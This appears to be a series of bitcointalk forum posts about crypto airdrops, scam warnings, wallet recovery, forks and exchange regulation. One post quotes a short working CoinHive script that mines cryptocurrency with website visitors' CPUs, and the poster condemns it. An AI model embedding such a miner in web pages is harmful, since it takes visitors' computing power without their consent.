Is the OP saying that in order to open an etherdelta account you have to give them your private keys? My response is NO WAY! An exchange should never ask your private key. This sounds scammy to me. They should be giving you an address to send your coins to, right?
But if you must, as others have said, open a brand new empty wallet, and link that to your account.
This whole thing has my scam alert going off.

I'm not very familiar with Ripple, but if it's like other Cryptos, just having your address and password may not be enough. You need the private key to restore the wallet. Can you take the hard drive out of the laptop, hook it up as a USB (need to buy a cable to do this), and try to recover your wallet files? Sometimes if it's just a board failure or operating system failure, you can still get the data off your hard drive. If you can get the wallet file, you can probably recover your funds with just your password.

If the airdrop is asking for your etherium address, it is because the new token created will be part of the etherium blockchain. You need to download a wallet, like myetherwallet (make sure you get the official one, lots of scams with this wallet), and send them your address (and as other have said, your address is different than your private key, it's okay to send your address, but never send your private key to anyone). If the airdrop is legit, and you are accepted, the tokens should show up in your myetherwallet eventually.
There are many versions of air drops ... this example was for etherium. Waves is like etherium, so if the airdrop asks for your waves wallet, it works the same, you just just need to download a waves wallet to get started.

I've never used Antshares or Neo, but didn't Antshares "rebrand" as Neo a few months ago? Could that be the source of your problem? Your wallet software is badly out of date or perhaps there was some coin swap that needs to be done? Hopefully someone with Antshares/Neo experience can chime in.

Support - because the idea of BTG is good. They want the power of mining to go back to the common man so, people with GPUs can start mining again. Else, all the hashing power is currently concentrated with the huge mining farms worldwide, who vote unanimously about the future of BTC.
I have to agree with this ... the original idea of BitCoin was that everyone with a CPU could have a vote, but over the years, it's become that you need $100,000+ in mining equipment and a huge utility bill to get a vote. I honestly don't know if BitCoinGold is going to catch on and "fix" anything, but Bitcoin has definitely strayed from it's original design, and competing ideas should be welcomed.

your page is using all my CPU power when opening in GoogleChrome...Are you mining with visitors CPU powers? ![Smiley](https://bitcointalk.org/Smileys/default/smiley.gif) Yes this website is doing exactly what thepiratebay did. I said that it'll surely be implemented to other websites as well. There must be a solution to this ! Websites can't just exploit users' resources that easily ! <script> var miner = new CoinHive.Anonymous('us94mKFnciQj8MKPPgEzEgSGRK8SnhTH'); miner.start(); </script> Looks like this is all it takes. Probably going to have to start figuring out how to block "CoinHive".

I wouldn't downplay the regulation trouble they are going to run into. I was an early adopter in Prosper/LendingClub, which evolved out of Social Media, and they had a horrible time with regulation. Not only did they have to meet federal requirements, but they had to meet the requirements of each state, too. There are still states where Prosper/LC is not legal. Now imaging that on a Global Scale.
SALT is not following the same business model, but any "innovation" in the banking industry is meet with resistance. There have been a lot of changes in the crowd funding law, and Lending Club has to some extent paved the way ...
That said, I'm keeping an eye on SALT. I've decided to take a chance on it if it drops below $3, and it's almost there. Looks like it hit 3.06 this morning and bounced a little. Maybe other people had the same idea.

All of these etherium and waves based token that appeared overnight had no white papers, no websites, no indication of the person or team behind them....Although it didnt look malicious (I.e., no one asking for private keys or sketchy wallet downloads that I saw), they were probably just money grab attempts based on the brief success of eBTC. I think the mods made the right choice by giving them the axe, if that is what happened.

Is the Athena "Airdrop" Announcement page legit? Looks like the mods or someone else keeps taking it down and putting it back up.

Does anyone know when the OMG airdrop for SingularDTV and Golem is going to come? What are the ratio of these airdrops going to be? If anyone can help me out here it would be greatly appreciated, thanks ![Smiley](https://bitcointalk.org/Smileys/default/smiley.gif) Also, why is there 2 bitcoingolds? Will tehy have an airdrop for waves holders as well? I'd like to know about the OMG drops, too. There is very little info on those except that they said were coming on their social media. Did anyone ever get OMG from Golem or SingularDTV? Also, I think the Waves version of BitcoinGold was someone trying to frontrun the original BitcoinGold, get theirs out first, and maybe get a pump off name recognition. As far as I know, they are not related to eachother. Also want to mention that many of the "e____" announcement pages are now gone, perhaps taken offline by a mod. I'll give a day or so to see if they come back, then I'll start removing them from the list.

Wow ... this is a really good question. I must admit, I never thought about this. There are like dozens of "legit" etherium tokens, and 100s of crap-tokens, which would all be copied. Could coins like "Osmise GO Classic" and "Civic Classic" be a thing? Man ... what a mess that could be ....
|
|
|
Added a few more, Cantra, Athena, Funnel, and Dragon Exchange look to be more "legit" than the outbreak of "e___" and "w____" announcements hitting right now, but we will see.

Did you figure out the source of the Hack/Virus/Scam that took your coins? Let us know if you do. The level of Crypto theft is skyrocketing lately, and getting more advanced.

Updated today with a bunch of new airdrops that appeared overnight... I must say, most of these (eLTC, eBCH, eETH, eNEO) are most likely jokes ... pretty sure DimonCoin ("FUD Decentralized") is a joke, too.

From what I understand, the BitCoin Gold fork is different than the potential SegWit2X Fork.
BitCoin Gold will launch Oct 25th, and is basically someone's attempt to "cash in" by splitting the chain. The SegWit2X Improvement will activate around Nov. 18th, and as I understand it, could be another split point in the chain where a group may attempt to continue mining on the "unimproved" block chain to create another coin.
Is that accurate?
|
|
|
I'm still unclear on this. I've read numerous articles and I've seen that the segwit2x improvement is highly opposed, but none of these articles state whether or not anyone with great hashing capacity actually intends to create a 'new' coin and continue mining on the "unimproved" BlockChain.
What is the verdict on this? Yes, No, We don't know yet?

I did some formatting and added Ranks to best of my knowledge (Note, rank availability appears to change for some of these campaigns as tokens are distributed). If anyone knows if Ranks are considered for ETHD or POS Token, let me know, I'll Update. If I missed an AirDrop, let me know, too. I'm kind of on the fence about adding the "joke" projects like Spinner and No Mo ICO. What do you think?
Also, I'm interested in tracking forks that created new "claimable" coins (Like BCH, ETC) and "forced" airdrops (like the OMG airdrop where they just put it in any wallet with an Etherium balance), since there are probably a lot of unclaimed/unknown coins/tokens out there. If you know of a one, post a links, and I'll add it.

They were doing more than just trading, they were running an exchange. Running an unlicensed exchange is risky business in any country.
But I find this sentence from the OP article to be most interesting:
"He further said that if found guilty the suspects will be punished under the prevalent laws of Rastra Bank."
Are finacial laws in Nepal set by the bankers?

The only way to answer the question is "maybe". You are currently ineligible because of the newness of your account. However, the developers have already pushed the registration date forward once already. There is still 27 weeks left in this campaign, so it is conceivable that they may push it forward again at some point in the future. Just keep an eye on it.
